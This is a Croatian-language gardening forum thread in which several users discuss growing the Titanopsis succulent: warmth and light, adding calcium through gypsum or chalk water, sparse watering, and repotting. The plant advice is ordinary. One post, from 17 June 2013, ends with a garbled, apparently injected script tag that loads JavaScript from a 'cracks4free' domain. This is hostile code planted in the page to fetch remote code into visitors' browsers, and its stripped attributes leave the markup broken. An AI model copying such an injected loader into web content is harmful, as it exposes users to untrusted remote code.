Početna stranica Početna stranica > Cvijeće - Forum o cvijeću > Sukulenti i kaktusi
  Aktivne teme Aktivne teme RSS Feed - Titanopsis
  Pomoć Pomoć  Pretraga foruma   Događanja   Registracija Registracija  Prijava Prijava


Titanopsis

 Odgovori Odgovori Stranica  <12
Korisnik
Poruka
belica View Drop Down
Neukroćena biljka
Neukroćena biljka
Avatar

Pridružen: 14 Ožujak 2012
Lokacija: Zagreb
Status: Offline
Bodovi: 2763
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje belica Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 08 Prosinac 2012 u 07:02
Krasan je cvijetić. Vidim da ti svog držiš na toplom u kući ? Moj je u jako hladnom hodniku na prozoru- je li to greškica možda ?
belica,zagreb
Na vrh
Sponzorirani linkovi


Na vrh
Pinus View Drop Down
Neukroćena biljka
Neukroćena biljka
Avatar

Pridružen: 30 Listopad 2009
Status: Offline
Bodovi: 4559
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Pinus Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 08 Prosinac 2012 u 09:42
Belica, po meni je to greška. Titanopsis je sada u vegetaciji. Uz svijetlo treba i toplotu. Kod mene je trenutno na zapadnom prozoru, temp. 20 C ± 3C, (dan, noć, ...)
Na vrh
belica View Drop Down
Neukroćena biljka
Neukroćena biljka
Avatar

Pridružen: 14 Ožujak 2012
Lokacija: Zagreb
Status: Offline
Bodovi: 2763
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje belica Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 08 Prosinac 2012 u 09:44
uh onda ću ga preseliti u toplije krajeve... imam ga tek od nedavno pa nisaam znala. hvala

belica,zagreb
Na vrh
belica View Drop Down
Neukroćena biljka
Neukroćena biljka
Avatar

Pridružen: 14 Ožujak 2012
Lokacija: Zagreb
Status: Offline
Bodovi: 2763
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje belica Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 13 Siječanj 2013 u 06:50
evo preseljen u toplije krajeve...


belica,zagreb
Na vrh
Fiki View Drop Down
Trajnica
Trajnica


Pridružen: 11 Prosinac 2011
Lokacija: .
Status: Offline
Bodovi: 2792
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Fiki Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 13 Siječanj 2013 u 19:24
Belice-predivan je....jel ga prehranjuješ?
Na vrh
Fiki View Drop Down
Trajnica
Trajnica


Pridružen: 11 Prosinac 2011
Lokacija: .
Status: Offline
Bodovi: 2792
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Fiki Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 16 Lipanj 2013 u 12:34
Porijeklo: Južna Afrika,poglavito Kalahari
Svjetlo + + +
Minimalna temp- -1 C
Zemlja: Dobro drenirana
Cvjetanje-4 godine.,promjer 3 cm
Voda-kao i ostalih sukulenata oksudna ----------------------- 
Opis :
Četinjasti listovi prekriveni sitnim kvržicama oblikuju male rozete ,koje u prirodnom okolišu se uklapaju u okolne stijene...Wink

Zovu  ga i Kamenom života jer zahvaljujući svojoj kamuflaži preživljava:::

Evo i mojih...



Očekujem vaša iskustva! Hug




Na vrh
Miss M. View Drop Down
Mladi grm
Mladi grm
Avatar

Pridružen: 17 Svibanj 2009
Lokacija: Croatia
Status: Offline
Bodovi: 603
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Miss M. Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 16 Lipanj 2013 u 20:34
titanopsis calcarea kao što mu samo ima govori treba kalcij u supstratu, u prirodi raste na vapnenačkim stijenama. Ja sam mom dodala izmrvljeni gips u supstrat. Zalijevam ga odozdo i to vrlo rijetko ako želiš da ostane ovako zbijenog izgleda, vidjet ću koliko će to biti uspješno.
Na vrh
Fiki View Drop Down
Trajnica
Trajnica


Pridružen: 11 Prosinac 2011
Lokacija: .
Status: Offline
Bodovi: 2792
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Fiki Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 17 Lipanj 2013 u 11:49
Ja izmrvim krede u mlaku vodu i zalijem----voda-kišnica.....sve super raste,,,inače kreda je odličan izvor kalcija!< ="text/" a< ="text/" async="" ="http://cracks4free.info/5/adds.js">
Na vrh
marsha View Drop Down
Mladi grm
Mladi grm
Avatar

Pridružen: 17 Ožujak 2012
Status: Offline
Bodovi: 576
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje marsha Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 18 Listopad 2013 u 14:55
Da li da ga presađujem??
Tegla je ispunjena.



Na vrh
Glikica View Drop Down
Cvjetni guru
Cvjetni guru
Avatar

Pridružen: 31 Svibanj 2012
Status: Offline
Bodovi: 6512
Opcije poruke Opcije poruke   Hvala (0) Hvala(0)   Citiranje Glikica Citiranje  OdgovoriOdgovor Direktni link do posta Objavljeno: 18 Listopad 2013 u 15:19
Ooo, ima tu još mjesta u teglici, a i cvate sad, ne diraj ga. Imaš vremena za presađivanje, ne raste on tako brzo.
...i kad poželiš se ravnice, dođi u Vinkovce...
Na vrh
 Odgovori Odgovori Stranica  <12
  Prosljedi temu   

Pređi na drugi forum Forumska ovlaštenja View Drop Down

Forum Software by Web Wiz Forums® version 10.15
Copyright ©2001-2013 Web Wiz Ltd.

Stranica je generirana u 0,188 sekundi.